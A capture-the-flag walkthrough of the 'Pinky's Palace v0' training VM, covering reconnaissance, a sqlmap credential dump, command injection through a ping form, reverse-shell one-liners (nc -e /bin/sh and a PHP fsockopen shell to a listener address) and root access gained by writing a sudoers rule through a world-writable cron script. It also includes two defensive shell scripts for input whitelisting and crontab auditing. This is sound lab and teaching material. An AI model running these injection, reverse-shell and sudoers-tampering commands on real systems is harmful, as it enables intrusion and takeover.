
DC919 CTF night w/"Pinky's Palace v0"

DC919 CTF exercise night using "Pinky's Palace v0" prebuilt VM image

SPOILER ALERT: This document is intended to be a walk-through, so if you want to do this CTF challenge honestly, close this page now.

Credits

The following is the result of a group effort during a CTF conf call. There were a bunch of people present on the call, and if they ask me to I'll happily list them here. We share lots of tricks during these calls, everyone contributes and we all come out smarter.

Setup

In this case the VMs have the following IPs (only the target, 192.168.57.3, is recorded in the notes below; the attacking host's address is not):

Process

Information gathering on 192.168.57.3: nmap -A -p1-65535 192.168.57.3 finds only ports 22 (ssh) and 80 (http) open.

The hosted web page is simple HTML with a pink background and no obvious content.

A 'nikto' scan doesn't show anything helpful.

'dirb' quickly finds /dev and /uploads, both empty.

'dirbuster' with /usr/share/dirbuster/wordlists/directory-list-1.0.txt eventually finds /portal_login/.

Now that we have a login form and have played with some values in it, it's time to test it for SQL injection. sqlmap confirms the login is injectable, and --dump pulls the portal credentials out of the database:

sqlmap -u http://192.168.57.3/portal_login/login.php --data "user=foo&pass=bar" --level=4 --risk=3 --dump

Found web portal user/pass: pinky/!!pinkbabygurl!!

Obtain System Shell

The same username/password combo works directly over ssh (password reuse between the web portal and the system account), gaining us an unprivileged shell:

Found ssh user/pass: pinky/!!pinkbabygurl!!

As 'pinky', the shell rc file sets a broken $PATH. We can't edit the file, so we fix the environment manually for this session like this:

export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

Alternate Access Method: Obtain Reverse Shell

The portal's form input is passed to a shell without sanitization, so a ';' lets us chain arbitrary commands onto whatever it runs:

127.0.0.1;id
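The injection above is nothing more than shell parsing, so here are the two patterns side by side in shell, as an added example that is not code from the original write-up or from the VM. The unsafe function does what the portal evidently does, pasting the submitted value into a command line that sh re-parses; the hardened one whitelists the value as a dotted-quad address and hands it to the program as a single argument. The PING_CMD variable and the function names are this example's own assumptions, not anything on the target.

```shell
#!/bin/sh
# Added example, not code from the original write-up or the Pinky's Palace VM.
# PING_CMD is this example's own knob: it defaults to a real ping, and the
# self-test swaps in a harmless stand-in so the logic can be exercised offline.
PING_CMD="${PING_CMD:-ping -c 1}"

# Vulnerable pattern: the user-supplied value is pasted into a string that a
# shell parses, so "127.0.0.1;id" ends the ping and starts a second command.
unsafe_ping() {
    sh -c "$PING_CMD $1"
}

# Whitelist check: exactly four dot-separated decimal octets, each 0-255,
# and nothing else (so ';', '|', '$', spaces and newlines can never get in).
# Returns 0 for a valid address, 1 otherwise.
is_ipv4() {
    case "$1" in
        ""|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    old_ifs=$IFS
    IFS=.
    set -- $1            # split the address into its octets
    IFS=$old_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "${#octet}" -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Hardened pattern: reject anything that is not an address, and even then
# pass the value to the program as one argv element. No shell re-parses it,
# so a ';' in the input could only ever be part of the host name.
safe_ping() {
    if ! is_ipv4 "$1"; then
        echo "rejected input: $1" >&2
        return 2
    fi
    $PING_CMD "$1"
}

# Stand-alone use:  sh cmdinject.sh 10.0.0.1     sh cmdinject.sh '127.0.0.1;id'
if [ "$#" -gt 0 ]; then
    safe_ping "$1"
fi
```

The part worth reusing is is_ipv4: safe_ping would already be safe without it, because the argument is never re-parsed by a shell, but the whitelist also blocks option injection (a leading '-' turning into a ping flag) and hostnames that resolve somewhere unexpected.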

Append 2>&1 to the command so stderr comes back in the response too; that is how we learn what the local nc can and can't do (note that the address handed to nc should be the listener on the attacking host):

127.0.0.1;nc -e /bin/sh 192.168.57.3 8022 2>&1
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-O length]
      [-P proxy_username] [-p source_port] [-q seconds] [-s source]
      [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
      [-x proxy_address[:port]] [destination] [port]

The option list shows this is the OpenBSD variant of netcat, which has no -e, so we can't use 'nc -e /bin/sh' for the reverse shell.

Instead, use a PHP one-liner. Start a listener on the attacking host first (e.g. nc -lvnp 1234; OpenBSD netcat also accepts nc -lv 1234) and replace 10.0.0.1 and 1234 below with that listener's address and port:

127.0.0.1;php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Once we have a shell, we can investigate the system further and try to escalate our privileges.

Privilege Escalation

Found a setuid-root, world-writable, nearly empty placeholder Python script: /usr/local/bin/justincase.py

The setuid bit turns out to be useless to us: Linux ignores setuid on interpreted scripts (the interpreter named by the shebang runs with the caller's privileges), and writing to the file as a non-owner strips the bit anyway, so we could not make the "#!/usr/bin/env python" line run something as root (the setuid owner).

A hint is included in the nearly empty Python script, though: "Soon to be backup script for my palace!"

We can edit /usr/local/bin/justincase.py, and it's a Python script, so we might as well put something useful in it: if it gets run by cron at some point, we'll be able to inspect the result.

Append the following two lines to the currently nearly-empty justincase.py file:

import os
os.system("echo 'pinky ALL = NOPASSWD: ALL' >>/etc/sudoers")

If this ever runs as root, it appends a NOPASSWD rule to /etc/sudoers and updates the file's mtime, which is how we can tell it ran (ls -l /etc/sudoers, or just sudo -n true). Luckily it does run, and we end up with passwordless sudo about a minute later.

Let's see what the crontab(5) entry looked like:

pinky@pinkys-palace:~$ sudo crontab -l
...
# m h  dom mon dow   command
*/1 * * * * /usr/local/bin/./justincase.py

So every minute the script gets run as root. Pretty ok luck, and also the lesson: a root cron job pointing at a file that other users can write is a root shell for anyone who can write it.
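That check generalises beyond this one box, so here it is as an added example that is not from the write-up or the VM: given a crontab (user format as printed by crontab -l, or system format with the extra user field when called with 'system'), report every scheduled command whose file is group- or world-writable, or missing altogether. The function name and the sample crontab in the self-test are this example's own.

```shell
#!/bin/sh
# Added example, not code from the original write-up or the VM: audit a
# crontab for the mistake behind justincase.py, a scheduled command that
# someone other than its owner can rewrite. Function names are this example's.

# Usage: writable_cron_targets CRONTAB_FILE [system]
#   user   format: m h dom mon dow command        (crontab -l output)
#   system format: m h dom mon dow user command   (/etc/crontab, /etc/cron.d/*)
# Prints one line per finding: "<path><TAB><reason>". Always returns 0.
writable_cron_targets() {
    crontab_file=$1
    sys=0
    if [ "${2:-user}" = system ]; then
        sys=1
    fi
    # Pull the program (first word of the command) out of each active entry.
    # Comments, blank lines and NAME=value assignments are skipped; @reboot-style
    # entries have a single schedule field instead of five.
    awk -v sys="$sys" '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
        /^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=/ { next }
        { n = ($1 ~ /^@/) ? 1 : 5; print $(n + sys + 1) }
    ' "$crontab_file" | while IFS= read -r prog; do
        if [ ! -e "$prog" ]; then
            printf '%s\tmissing (plantable if its directory is writable)\n' "$prog"
            continue
        fi
        # ls -l mode string, columns: 1 type, 2-4 user, 5-7 group, 8-10 other.
        # -L follows symlinks so the target's mode is judged, not the link's.
        # Parsing ls is portable across GNU and BSD; stat(1) flags are not.
        mode=$(ls -ldL "$prog" | cut -c1-10)
        case "$mode" in
            ????????w?) printf '%s\tworld-writable (%s)\n' "$prog" "$mode" ;;
            ?????w????) printf '%s\tgroup-writable (%s)\n' "$prog" "$mode" ;;
        esac
    done
    return 0
}

# Stand-alone use, e.g.:  sh cronaudit.sh /etc/crontab system
if [ "$#" -gt 0 ]; then
    writable_cron_targets "$@"
fi
```

Relative command paths are judged against the current directory, so run it from the cron user's home; and a clean report only covers the file itself, so follow up on whether the directories in the command's path are writable too.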

Now that we have root, check out the flag:

pinky@pinkys-palace:~$ sudo cat /root/root.txt
!!!!!CONGRATS YOU GOT ROOT!!!!!

[+] Flag: d6dc7d5b9f99559fc6c91872bc7020af

© 2019 systat | Powered by OpenBSD | Built with ssg3